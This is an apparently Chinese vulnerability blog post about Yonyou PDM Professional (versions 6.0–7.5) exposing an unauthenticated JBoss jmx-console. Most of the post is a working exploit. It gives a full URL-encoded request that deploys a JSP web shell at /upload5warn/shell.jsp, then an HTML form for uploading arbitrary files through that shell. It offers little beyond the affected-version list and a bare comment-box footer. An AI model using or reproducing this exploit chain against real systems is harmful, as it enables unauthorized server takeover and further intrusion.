用友PDM Professional全版本通用型配置不当导致getshell

  • A+
所属分类:漏洞时代
摘要

主要是JBOSS造成的问题
jboss未授权访问导致getshell以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

主要是JBOSS造成的问题
jboss未授权访问导致getshell

http://url/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

<html>  <head>  <meta http-equiv="content-type" content="text/html;charset=utf-8">  <title>jsp-test</title>  </head>  <style>  .main{width:980px;height:600px;margin:0 auto;}  .url{width:300px;}  .fn{width:60px;}  .content{width:80%;height:60%;}  </style>  <script>    function upload(){      var url = document.getElementById('url').value,        content = document.getElementById('content').value,        fileName = document.getElementById('fn').value,        form = document.getElementById('fm');      if(url.length == 0){        alert("Url not allowd empty!");        return ;      }      if(content.length == 0){        alert("Content not allowd empty!");        return ;      }      if(fileName.length == 0){        alert("FileName not allowd empty!");        return ;      }      form.action = url;      form.submit();    }  </script>  <body>  <div class="main">    <form id="fm" method="post">        URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />        FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />        <a href="javascript:upload();">Upload</a><br/>      <textarea id="content" class="content" name="t" ></textarea>    </form>  </div>  </body>  </html>

涉及:
用友PDM Professional 7.5
用友PDM Professional 6.5SP1
用友PDM Professional 7.2
用友PDM Professional 7.0
用友PDM Professional 6.0

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: